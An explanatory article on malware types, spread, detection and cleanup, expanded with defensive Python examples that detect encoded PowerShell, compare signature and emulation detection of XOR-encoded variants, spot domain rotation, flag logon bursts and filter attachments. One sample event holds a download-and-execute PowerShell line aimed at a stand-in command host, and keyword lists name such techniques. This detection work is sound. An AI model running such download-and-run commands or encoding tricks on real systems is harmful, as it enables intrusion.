What is malware?
Malware (malicious software) is any type of programming intended to cause harm. Among other things, a malware infection can corrupt files, alter or delete data, distribute confidential data, disable hardware, deny legitimate user access, and cause a hard drive to crash. Frequently, the origin of malware is designed to be spoofed. This can be confusing, especially if malicious code seems to send itself from your e-mail account to all the friends and colleagues in your address book. The results of malware infection include compromised systems, lack of regulatory compliance, lost or stolen data, and the loss of user and client confidence.
Global malware attacks rose in 2018 for the third consecutive year, with a record number of 10.52 billion attacks recorded, according to the latest Cyber threat report by security firm SonicWall. The number of malware attacks was up 22% compared with 2017, and up 29% compared with 2016, with more than 391,600 new attack variants identified in the past year, including 74,290 never-seen-before attacks.
Brazil saw the biggest increase in malware volume of 119%, followed by Canada (103%), Germany (99%), and the UK (57%) – although the UK volume of nearly 584 million was second only to the US, which recorded the highest malware volume of just more than five billion instances.
Common types of malware
Although each type of malware has defining characteristics, the distinctions between them are becoming blurred because blended threats are becoming increasingly common. Blended threats combine characteristics of more than one type of malware to maximize the damage they cause and the speed of contagion.
Viruses self-replicate within computers and across networks and alter files or data. They usually require some action on the user's part to start, most often just clicking an executable file attachment on an e-mail (although embedded programming in an e-mail message can execute a virus program). Typically, people think that the file came to them from a trusted source or is something they want to see.
Worms are self-propagating malware that can infect a computer without any user interaction, typically by exploiting a vulnerability in a network-exposed service. Unlike a classic file-infecting virus, a worm does not need to attach itself to other files; it resides in active memory and duplicates itself across the network, using parts of an operating system that are automatic and usually invisible to the user. It is common for worms to be noticed only when their uncontrolled replication consumes network bandwidth or system resources, slowing or halting other tasks.
Trojans are malicious code hidden within innocuous-looking programs or data in such a way that it can gain control and do its chosen form of damage, such as ruining the file allocation table on your hard disk. Unlike viruses and worms, Trojans do not self-replicate; they rely on the user being tricked into running them, although a Trojan horse may be widely redistributed along with a virus.
Spyware is programming that is put into your computer to secretly gather information and relay it to advertisers or other interested parties. Spyware can get into a computer as a software virus or as the result of installing a new program. Although not always destructive in intent, spyware is often installed without your consent and even without your knowledge, as a drive-by download or as the result of clicking a compromised URL. By the same token, adware, which usually includes spyware components, can also be considered malware.
Browser hijackers are programs that alter your computer's browser settings so that you are redirected to Web sites you had no intention of visiting. Most browser hijackers alter default home pages and search pages to those of their customers, who pay for that service because of the traffic it generates. More virulent versions often: add bookmarks for pornographic Web sites to the users' own bookmark collection; generate pornographic pop-up windows faster than the user can click them shut; and redirect users to pornographic sites when they inadvertently mistype a URL or enter a URL without the www. prefix. Poorly coded browser hijackers -- which, unsurprisingly, are common -- may also slow your computer down and cause browser crashes.
Point-of-sale malware (POS malware) is malicious software expressly written to steal customer payment data -- especially credit card data -- from retail checkout systems. There are two ways to target a store's customer credit card data: the attacker can infiltrate databases where the data is stored or intercept the data at the point of sale (POS), usually by scraping it from the checkout application's memory before it is encrypted.
Cryptomining malware (cryptojacking) is malicious code that takes over a computing device's resources so an attacker can use the device's processing power to mine cryptocurrency, that is, to perform the proof-of-work computations that add transactions to a distributed ledger, with the mining rewards going to the attacker's wallet. Because cryptomining software runs in the background, a user might not realize they have been the victim of an attack until they notice sustained high CPU or GPU use, slower performance, or higher power bills.
Mobile malware is malicious software specifically written to attack mobile devices such as smartphones, tablets, and smartwatches. These types of malware rely on exploits of particular mobile operating systems and mobile phone technology.
Memory-scraping malware (also called a RAM scraper) reads the memory of running processes to find sensitive data, such as payment card numbers, at the moment it is held in plaintext before being encrypted or written to disk. It is the usual payload of POS malware, because card data that is encrypted in storage and in transit is still briefly exposed in the memory of the checkout application.
Fileless malware attacks are attacks that leverage applications and tools already installed on a computer, such as PowerShell, WMI, and the Windows registry, instead of dropping a new executable on disk. Unlike other malware attacks, where software is unknowingly installed onto the user's device, fileless attacks run their malicious code in memory through applications that are already installed and thought to be safe, so file-based antivirus scans have nothing to examine. Command-line logging and PowerShell script block logging are the main ways to catch them.
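As an added example (not part of the original article), here is how the command-line logging mentioned above can be turned into a detection. The script decodes PowerShell's -EncodedCommand argument, which is base64 of UTF-16LE text, and scores process-creation events by which process spawned PowerShell, which switches it was started with, and what the decoded script does. The log format, the events and the scoring weights are all constructed for this example and are assumptions, not a published rule.

```python
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encodedcommand); the argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
NOPROFILE_FLAG = re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE)
# Constructed event format (hypothetical): parent=<exe> child=<exe> cmd=<command line>
EVENT_RE = re.compile(r"^parent=(?P<parent>\S+) child=(?P<child>\S+) cmd=(?P<cmd>.*)$")

# Script content that usually means "download something and run it in memory".
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "net.webclient", "invoke-webrequest", "frombase64string",
                     "start-bitstransfer", "reflection.assembly")
# Office applications have no business spawning PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def encode_command(script: str) -> str:
    """Build the value PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (hypothetical, not real telemetry).
SAMPLE_PROCESS_EVENTS: List[str] = [
    "parent=WINWORD.EXE child=powershell.exe cmd=powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"),
    "parent=explorer.exe child=powershell.exe cmd=powershell.exe -File C:\\scripts\\backup.ps1",
    "parent=cmd.exe child=powershell.exe cmd=powershell.exe -enc "
    + encode_command("Get-Process | Out-File C:\\temp\\procs.txt"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(line: str) -> Optional[Dict]:
    """Score one process-creation event; higher means more likely a fileless attack."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    parent, cmd = m.group("parent").lower(), m.group("cmd")
    score, reasons = 0, []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits = [t for t in SUSPICIOUS_TOKENS if t in decoded.lower()]
        if hits:
            score += 2
            reasons.append("encoded command contains " + ", ".join(hits))
    if parent in OFFICE_PARENTS:
        score += 1
        reasons.append(f"spawned by Office application {parent}")
    if HIDDEN_FLAG.search(cmd):
        score += 1
        reasons.append("hidden window requested")
    if NOPROFILE_FLAG.search(cmd):
        score += 1
        reasons.append("profile disabled")
    return {"parent": parent, "decoded": decoded, "score": score, "reasons": reasons}


def scan(lines: List[str], threshold: int = 2) -> List[Dict]:
    """Return the events whose score meets the threshold."""
    results = [analyse_event(line) for line in lines]
    return [r for r in results if r is not None and r["score"] >= threshold]


if __name__ == "__main__":
    for hit in scan(SAMPLE_PROCESS_EVENTS):
        print(hit["score"], hit["reasons"])
        print("    decoded:", hit["decoded"])
```

The encoded backup script from cmd.exe decodes cleanly but scores zero, while the Word-spawned downloader scores on every axis; decoding first is what separates the two, because the raw base64 of both looks equally opaque to a string match.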
Metamorphic and polymorphic malware are two categories of malicious software programs that have the ability to change their code as they propagate. Polymorphic malware encrypts or encodes its body with a different key in each copy, so only a small decryption stub stays constant; metamorphic malware goes further and rewrites the whole program with each iteration, so that each succeeding version of the code is different from the preceding one. The code changes make it difficult for signature-based antivirus programs to recognize that different iterations are the same malicious program, which is why emulation and behavioral detection are used alongside signatures.
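To make the polymorphic case concrete, here is an added example (not from the original article) that builds several "generations" of one inert payload by XOR-encoding it under a fresh key behind a constant decoder stub, then compares four detectors against them: a file hash, a byte signature taken from the plaintext body, a signature on the constant stub, and emulation (decode first, then match). The payload, stub and key layout are constructed stand-ins; a real sample would carry machine code, not text.

```python
import hashlib
import os
from typing import Dict, List, Optional

# Constructed stand-ins (hypothetical): the "payload" is inert text and the
# "decoder stub" stands for the small, constant routine a real polymorphic
# sample uses to decrypt its body at run time.
PAYLOAD = b"EXAMPLE PAYLOAD: beacon to c2.example.invalid and wait for tasking"
DECODER_STUB = b"\x55\x89\xe5STUB"
KEY_LEN = 8
# Byte patterns a signature-based scanner might carry.
BODY_SIGNATURE = b"c2.example.invalid"   # taken from the plaintext payload
STUB_SIGNATURE = DECODER_STUB            # taken from the constant decoder


def make_variant(payload: bytes = PAYLOAD, key: Optional[bytes] = None) -> bytes:
    """Emit one generation: constant stub + fresh key + XOR-encoded body."""
    key = key or os.urandom(KEY_LEN)
    if len(key) != KEY_LEN:
        raise ValueError("key must be %d bytes" % KEY_LEN)
    body = bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(payload))
    return DECODER_STUB + key + body


def recover_payload(variant: bytes) -> bytes:
    """What the stub does at run time, and what an emulating scanner does before matching."""
    start = len(DECODER_STUB)
    key = variant[start:start + KEY_LEN]
    body = variant[start + KEY_LEN:]
    return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(body))


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_match(sample: bytes, known_hashes) -> bool:
    return sha256(sample) in known_hashes


def body_signature_match(sample: bytes) -> bool:
    """Naive scanner: look for the plaintext pattern in the file as stored on disk."""
    return BODY_SIGNATURE in sample


def stub_signature_match(sample: bytes) -> bool:
    """Signature on the part that polymorphism cannot change (metamorphism would)."""
    return sample.startswith(STUB_SIGNATURE)


def emulated_match(sample: bytes) -> bool:
    """Run the decoder first, then look for the body signature in the result."""
    return BODY_SIGNATURE in recover_payload(sample)


def compare_detectors(variants: List[bytes]) -> Dict[str, int]:
    """Return, per detector, how many of the variants it catches."""
    known = {sha256(variants[0])}   # the single sample the AV vendor has seen
    return {
        "hash": sum(hash_match(v, known) for v in variants),
        "body_signature": sum(body_signature_match(v) for v in variants),
        "stub_signature": sum(stub_signature_match(v) for v in variants),
        "emulation": sum(emulated_match(v) for v in variants),
    }


if __name__ == "__main__":
    gens = [make_variant() for _ in range(5)]
    print({k: f"{v}/5" for k, v in compare_detectors(gens).items()})
```

Expected result: the hash catches only the one sample it was taken from, the body signature catches nothing, and both the stub signature and emulation catch every generation. A metamorphic sample would also rewrite the stub, leaving emulation or behavioral monitoring as the only options in this comparison.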
Extension malware is any browser extension that was developed intentionally to cause undesirable behaviors. Security experts recommend that users be judicious when installing browser extensions. Whenever possible, you should check what permissions an extension requires. It’s wise, as well, to refrain from installing extensions from unknown companies and developers.
TDL-4 is sophisticated malware that facilitates the creation and maintenance of a botnet. The program is the fourth generation of the TDL malware, which was itself based on an earlier malicious program known as TDSS or Alureon. Like other botnets, the TDL network is used for spam and malware dissemination, denial of service (DoS) attacks, password theft and other types of online fraud.
Malvertisements (malicious advertisements) are advertisements on the Internet that are capable of infecting the viewer's computer with malware, typically by redirecting the browser to an exploit kit. Malvertising is a hijacking technique of choice for organized crime because ad networks place the attacker's content on reputable sites that users have no reason to distrust. Compromised computers can be used to create powerful botnets that can be used to carry out identity theft, corporate espionage or other illegal activity.
Scareware is a type of malware designed to trick victims into purchasing and downloading useless and potentially dangerous software that pretends to be antivirus or antispyware software, a firewall application or a registry cleaner. End users may get a message that says a large number of problems -- such as infected files -- have been found on the computer and the user is prompted to purchase software to fix the problems. In reality, no problems were detected and the suggested software purchase may actually contain real malware.
How is most malware distributed?
Typically, malware is distributed in one of three ways: by e-mail, either through a virus-laden attachment or code embedded in the message body; in an infected application; or through infected code on a Web site. Originally, removable media -- floppy disks, and later USB drives -- was the vehicle most malware took to get to your computer, but now the vast majority of malware is distributed over the network.
A dropper is a malware installer that surreptitiously carries viruses, back doors and other malicious software so they can be executed on the compromised machine. Droppers don’t cause harm directly but can deliver a malware payload onto a target machine without detection.
Domain rotation is a technique used by malware distributors to drive traffic from many domains to a single IP address that is controlled by the distributor, switching to fresh domains as old ones are identified. The goal of domain rotation is to make it harder for a network administrator to blacklist the malware distributor, since blocking any one domain achieves nothing; blocking the IP address, or watching for many unrelated domains that resolve to one address, is more effective.
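The detection side of that, as an added example that is not part of the original article: group DNS answers by the IP address they return and flag addresses fronted by many unrelated domains. Subdomains are collapsed to a crude registrable domain (last two labels) so that a CDN serving img., static. and fonts. under one name does not trip the rule. The log format and every name and address below are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Constructed passive-DNS style log (hypothetical names under .test, documentation IPs).
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z client=10.0.0.5 qname=img.example-cdn.test answer=198.51.100.9
2024-05-01T10:00:02Z client=10.0.0.5 qname=static.example-cdn.test answer=198.51.100.9
2024-05-01T10:00:03Z client=10.0.0.6 qname=fonts.example-cdn.test answer=198.51.100.9
2024-05-01T10:01:10Z client=10.0.0.7 qname=secure-login-update.test answer=203.0.113.7
2024-05-01T10:01:11Z client=10.0.0.7 qname=account-verify-now.test answer=203.0.113.7
2024-05-01T10:03:40Z client=10.0.0.9 qname=invoice-portal.test answer=203.0.113.7
2024-05-01T10:04:02Z client=10.0.0.7 qname=cdn-assets-mirror.test answer=203.0.113.7
2024-05-01T10:05:15Z client=10.0.0.12 qname=www.mailhost.test answer=192.0.2.44
2024-05-01T10:06:00Z client=10.0.0.9 qname=doc-share-delivery.test answer=203.0.113.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) qname=(?P<qname>\S+) answer=(?P<ip>\S+)$")


def registrable_domain(qname: str) -> str:
    """Crude eTLD+1: the last two labels. Enough to collapse a CDN's subdomains here;
    a production tool should use the Public Suffix List instead."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def group_by_answer(lines: Iterable[str]) -> Dict[str, Dict]:
    """Collect, per answer IP, the distinct registrable domains, clients and time span.
    Assumes the log is in time order."""
    groups: Dict[str, Dict] = defaultdict(
        lambda: {"domains": set(), "clients": set(), "first": None, "last": None})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        g = groups[m["ip"]]
        g["domains"].add(registrable_domain(m["qname"]))
        g["clients"].add(m["client"])
        g["first"] = g["first"] or m["ts"]
        g["last"] = m["ts"]
    return groups


def find_rotating_domains(lines: Iterable[str], min_domains: int = 4,
                          allowlist: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Return {ip: sorted domains} for addresses fronted by at least min_domains
    unrelated domain names, skipping known-good addresses in allowlist."""
    allowed = set(allowlist)
    hits: Dict[str, List[str]] = {}
    for ip, g in group_by_answer(lines).items():
        if ip in allowed or len(g["domains"]) < min_domains:
            continue
        hits[ip] = sorted(g["domains"])
    return hits


if __name__ == "__main__":
    for ip, domains in find_rotating_domains(SAMPLE_DNS_LOG.splitlines()).items():
        print(ip, "<-", ", ".join(domains))
```

Large hosting providers and CDNs legitimately serve thousands of unrelated domains from one address, so the allowlist (or a higher threshold for known hosting ranges) is not optional in practice; the rule is a triage signal, not a verdict.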
Mimikatz is an open source post-exploitation tool, flagged as malware by most antivirus products, that hackers and penetration testers use to gather credentials on Windows computers. It reads the memory of the LSASS process to extract plaintext passwords, NTLM hashes and Kerberos tickets. Hackers use Mimikatz to extend their presence on victim networks by reusing those credentials on other systems (pass-the-hash, pass-the-ticket) or by extracting credentials from accounts with elevated privileges, such as those used by administrators. Enabling LSA Protection and Credential Guard, and keeping privileged accounts from logging on to ordinary workstations, limits what it can harvest.
How can I tell if my network has been compromised by malware?
An intrusion detection system (IDS) will usually spot malware for which it has a signature; new or modified malware can escape detection. Signs that your network has been compromised include a sudden, unexplained spike in traffic; unscheduled server reboots; signatures of known exploits in log files; unexplained failed logons, particularly bursts of failures across many accounts from one source; evidence of a packet sniffer; and a large number of spoofed packets detected leaving your network.
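Two of those signs can be checked mechanically from logs. The following is an added example, not from the original article: a sliding-window count of failed logons per source address, and a traffic-spike check that compares each minute's egress against the median of the preceding minutes (median rather than mean, so an earlier spike does not inflate the baseline). The log format, the events and the traffic figures are constructed; the thresholds are assumptions to tune against your own baseline.

```python
import re
import statistics
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed authentication log (hypothetical format and events).
AUTH_RE = re.compile(r"^(?P<ts>\S+) auth user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>OK|FAIL)$")
SAMPLE_AUTH_LOG = """\
2024-05-01T02:00:05Z auth user=alice src=10.0.0.5 result=OK
2024-05-01T02:10:11Z auth user=svc-backup src=198.51.100.20 result=FAIL
2024-05-01T02:10:12Z auth user=svc-backup src=198.51.100.20 result=FAIL
2024-05-01T02:10:13Z auth user=administrator src=198.51.100.20 result=FAIL
2024-05-01T02:10:14Z auth user=admin src=198.51.100.20 result=FAIL
2024-05-01T02:10:15Z auth user=root src=198.51.100.20 result=FAIL
2024-05-01T02:10:16Z auth user=bob src=198.51.100.20 result=FAIL
2024-05-01T02:45:00Z auth user=bob src=10.0.0.8 result=FAIL
2024-05-01T02:45:20Z auth user=bob src=10.0.0.8 result=OK
"""

# Constructed egress volume, megabytes per minute (hypothetical).
SAMPLE_EGRESS_MB = [41, 39, 44, 40, 38, 42, 45, 40, 39, 43, 41, 40, 38, 44, 39, 41, 40, 42, 910, 880]


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def failed_logon_bursts(lines, threshold: int = 5, window_s: int = 60) -> List[Dict]:
    """Alert once per source that accumulates >= threshold failures inside any
    window_s-second window, and list the accounts it has tried so far."""
    recent: Dict[str, deque] = defaultdict(deque)
    users: Dict[str, set] = defaultdict(set)
    alerts, fired = [], set()
    for line in lines:
        m = AUTH_RE.match(line.strip())
        if not m or m["result"] != "FAIL":
            continue
        src, t = m["src"], parse_ts(m["ts"])
        q = recent[src]
        q.append(t)
        users[src].add(m["user"])
        while (t - q[0]).total_seconds() > window_s:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and src not in fired:
            fired.add(src)
            alerts.append({"src": src, "failures": len(q), "users": sorted(users[src]), "at": m["ts"]})
    return alerts


def traffic_spikes(samples: List[float], factor: float = 3.0, baseline_len: int = 10) -> List[Tuple[int, float]]:
    """Flag minute i whose volume exceeds factor times the median of the
    preceding baseline_len minutes."""
    spikes = []
    for i in range(baseline_len, len(samples)):
        base = statistics.median(samples[i - baseline_len:i])
        if samples[i] > factor * base:
            spikes.append((i, samples[i]))
    return spikes


if __name__ == "__main__":
    for a in failed_logon_bursts(SAMPLE_AUTH_LOG.splitlines()):
        print("logon burst from", a["src"], "at", a["at"], "accounts tried:", a["users"])
    for minute, mb in traffic_spikes(SAMPLE_EGRESS_MB):
        print("egress spike at minute", minute, ":", mb, "MB")
```

The single failure from 10.0.0.8 followed by a success is a user mistyping a password and is ignored; the six failures in six seconds across five different accounts from one external address is the password-spraying pattern the rule is meant to surface.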
Are the number of malware attacks increasing?
Yes. As network defenses increase in sophistication, so do the anonymity of attacks and the targeting of non-standard ports to ensure malicious payloads are concealed upon delivery. For example, SonicWall threat researchers identified processor vulnerabilities as a growing security concern for software and hardware technologies, with multiple side-channel attacks among the new attack vectors detected in the past year. Based on a sampling of more than 700 million malware attacks, SonicWall found that 19.2% of malware attacks used non-standard ports, which was up 8.7% when compared to 2017.
What's the spam-malware connection?
Although malware-laden messages are often thought to be a different category of unwanted e-mail, they generally fit the criteria for spam:
A. They're unsolicited; and
B. They're sent in bulk.
Ed Skoudis, author of Malware: Fighting Malicious Code explains how it works: "Malware and spam are working together in a vicious cycle. Attackers use spam to spread backdoors to machines via mass e-mailings. Unwitting users execute these e-mail attachments, thereby installing the backdoor onto their systems. Attackers then use the newly infected system as a bounce-off point to send even more spam while laundering their source address and evading e-mail server antirelay and filter settings."
MessageLabs, a New York-based company, analyzed server data and found that many spam messages were originating from known sources of viruses. According to their analysis, MessageLabs reported that the Sobig virus and its earlier variants were probably created by spammers.
The point: Spam isn't just a nuisance; it's a serious threat to network security. Deleting junk e-mails at the desktop isn't good enough. Use the best spam filters available, and push for global solutions to the spam problem.
How do I get rid of malware?
If both your anti-spyware and anti-virus products fail you, you will probably have to try a more hands-on approach. The first thing to do is to find and disable suspicious processes. For recent Windows operating systems, bring up the Task Manager window (hit control-alt-delete or right-click the task bar to do this) and look under the Processes tab. A number of Web sites, such as Sysinfo.org and reger24.de, have lists and/or searchable databases of start-up processes. If you can't find any information there about what a currently running process is, plug its name into a search engine. When you identify a process as being part of the malware problem, select it in Task Manager and click the End Process button.
Sometimes when you do so, you'll get a message such as "access denied", in which case you'll have to use stronger medicine. A program such as PsKill, from Sysinternals (now part of Microsoft), will do the trick. PsKill is available from the Sysinternals Web site. Follow the straightforward instructions there to remove any stubborn processes. Another program, Autoruns (also available from Sysinternals), can be used to find the settings causing these programs to run again when Windows is restarted. Delete these when you find them. Once you've completed these steps, the malware should be disabled, but because rootkits and droppers can hide from a live system, the only way to be certain a compromised machine is clean is to reinstall it from known-good media and restore data from a backup taken before the infection. One final word of caution: be very sure that a program is malware before you delete it, or you could cause yourself more problems than you solve.
What should I be doing to protect my system /network from malware?
There's a reason you were vulnerable to an attack, so you will need to work backward to find the gaps in your security strategy. If it's your users, look at security awareness training. If the problem is too many phishing emails coming through, look at an email scanning product. The best position to protect your organization from malware is to have a layered approach, with each step addressing the problem of attacks from a different angle.
There are a lot of unknowns when it comes to malware attacks. It's one of the reasons this six-step malware response plan is so high-level. The key is to have a plan in place and proactively work backward to be ready. Determine what backups you require in the event of a successful attack and have a means by which users can inform IT of a possible infection. By following these steps, you have the foundation for a response plan that can address just about any malware attack.
For network administrators:
- Keep up with new threats -- it's not just your virus definitions that need to be kept up to date. Subscribe to an e-mail service, such as the one from Sophos, that sends out alerts about new malware as soon as it surfaces
- Ensure that appropriate security patches are installed promptly as soon as they become available. Although Microsoft released a patch for a security vulnerability in IIS server, both Nimda and Code Red were able to exploit the weakness, because so many systems remained unpatched
- Block file types commonly used to distribute viruses, such as .exe, .pif, .scr, and .vbs, and inspect archives, because attackers wrap executables in .zip files or use double extensions such as invoice.pdf.exe to get past simple filters. Although virus-laden attachments can appear to be of any file type, you'll be ahead if you keep out the usual suspects.
- Educate end users in safe messaging and browsing behavior
- Minimize user access to sensitive data
- Establish security policies for employees, with consequences for breaking the rules.
- Push security patches to end users
- Install a secure enterprise instant messaging (EIM) product or add security components to other products
- Schedule frequent security audits, preferably conducted by external auditors
- Ensure that remote users -- and their equipment -- are not security risks
- Have a disaster recovery plan in place, to protect your network and data from unforeseeable catastrophes
For end users:
- Keep virus definitions up to date and run antivirus software on a regular basis, at home as well as at work. If your home computer, laptop, or handheld device is in contact with computers at work, poor security practices could put the whole network at risk.
- Visit the Windows Update page frequently and download any advised security patches.
- Check the security information and options in your Web browser and set the latter appropriately.
- Never open questionable attachments. It pays to be suspicious, even if the message purports to be from someone you know. If an attachment is unexpected, verify with the sender before you open it. Because file extensions can be spoofed, don't assume that a file is safe to open, even if it appears to be a text file.
- Don't even open messages that seem suspicious. Malware can be embedded in the content of the message itself. Some viruses, such as BubbleBoy, Kak, and Nimda can infect your computer as soon as you open a message.
- Don't preview messages. If you browse through your messages with the preview window open, in effect you're opening each message that appears there. Viewing or previewing messages also encourages more spam. Many spam messages include a mechanism that informs the sender when a message is viewed. This confirms a live address, to which greater volumes of spam -- some of it virus-laden -- will be sent.
- Use appropriately stringent security settings in your e-mail program. In Outlook, for example, under Tools > Options > Security > Secure content > Attachment security, set attachment security to High so that you'll be prompted before opening attachments.
- Watch out for social engineering attempts. Never give out passwords or other protected information; don't leave them lying around (or on a sticky note affixed to your computer, for that matter -- a surprisingly common practice).
- If possible, opt to view messages in text only.
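The administrator's advice to block the usual executable extensions and the end-user's advice that file extensions can be spoofed are two halves of one check. As an added example that is not part of the original article, the filter below combines a blocklist on every suffix in the name (so invoice.pdf.exe is caught), a look at the file's magic bytes (so a PE renamed to .txt is caught), a check for the right-to-left override character that makes photo[RLO]gpj.exe display as photoexe.jpg, and a peek inside zip archives at their members' names and headers. The blocklist and the sample attachments are constructed for the example and are assumptions, not a recommended policy.

```python
import io
import zipfile
from typing import Dict, List

# Hypothetical block policy: the page's usual suspects plus common script and
# shortcut types. Adjust to your environment.
BLOCKED_EXTENSIONS = {".exe", ".pif", ".scr", ".vbs", ".com", ".bat", ".cmd", ".js",
                      ".jse", ".wsf", ".hta", ".lnk", ".msi", ".ps1"}
# Magic bytes: the content says what a file is, whatever its name claims.
MAGIC = [(b"MZ", "pe-executable"), (b"\x7fELF", "elf-executable"),
         (b"PK\x03\x04", "zip"), (b"%PDF", "pdf")]
RLO = "\u202e"  # right-to-left override: "photo" + RLO + "gpj.exe" renders as photoexe.jpg


def sniff(data: bytes) -> str:
    """Identify a file from its leading bytes."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension_chain(name: str) -> List[str]:
    """All suffixes of a name, so invoice.pdf.exe yields ['.pdf', '.exe']."""
    parts = name.lower().split(".")
    return ["." + p for p in parts[1:]]


def classify_attachment(name: str, data: bytes, depth: int = 0) -> Dict:
    """Decide allow/block from the name, the content and, for zips, the members."""
    reasons = []
    chain = extension_chain(name)
    kind = sniff(data)
    if RLO in name:
        reasons.append("right-to-left override character in filename")
    blocked = [e for e in chain if e in BLOCKED_EXTENSIONS]
    if blocked:
        reasons.append("blocked extension " + ", ".join(blocked))
    elif kind.endswith("executable"):
        claimed = chain[-1] if chain else "no extension"
        reasons.append(f"content is {kind} but name claims {claimed}")
    if kind == "zip" and depth >= 2:
        reasons.append("nested archive too deep to inspect")
    elif kind == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    with zf.open(info) as fh:        # stream only the header, not the whole member
                        head = fh.read(16)
                    inner = classify_attachment(info.filename, head, depth + 1)
                    if inner["blocked"]:
                        reasons.append(f"archive member {info.filename}: " + "; ".join(inner["reasons"]))
        except (zipfile.BadZipFile, RuntimeError) as exc:   # corrupt or password-protected
            reasons.append(f"archive could not be inspected ({exc.__class__.__name__})")
    return {"name": name, "type": kind, "blocked": bool(reasons), "reasons": reasons}


def build_zip(members: Dict[str, bytes]) -> bytes:
    """Helper to construct an in-memory zip for the sample below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, content in members.items():
            zf.writestr(member, content)
    return buf.getvalue()


# Constructed sample attachments (hypothetical, inert bytes).
SAMPLE_ATTACHMENTS = [
    ("notes.txt", b"Meeting moved to 3pm."),
    ("report.txt", b"MZ\x90\x00\x03" + b"\x00" * 20),        # name says text, content is a PE
    ("invoice.pdf.exe", b"MZ\x90\x00"),                       # double extension
    ("photo" + RLO + "gpj.exe", b"\xff\xd8\xff"),              # RLO trick on a real JPEG header
    ("docs.zip", build_zip({"readme.txt": b"hi", "setup.scr": b"MZ"})),
]


def filter_attachments(attachments) -> Dict[str, bool]:
    """Map each attachment name to whether the filter would block it."""
    return {name: classify_attachment(name, data)["blocked"] for name, data in attachments}


if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS:
        verdict = classify_attachment(name, data)
        print("BLOCK" if verdict["blocked"] else "allow", repr(name), verdict["reasons"])
```

A password-protected zip cannot be inspected and is blocked rather than waved through, which is the safe default since that is exactly how attackers ship executables past scanners; the cost is that users who legitimately exchange encrypted archives need another channel.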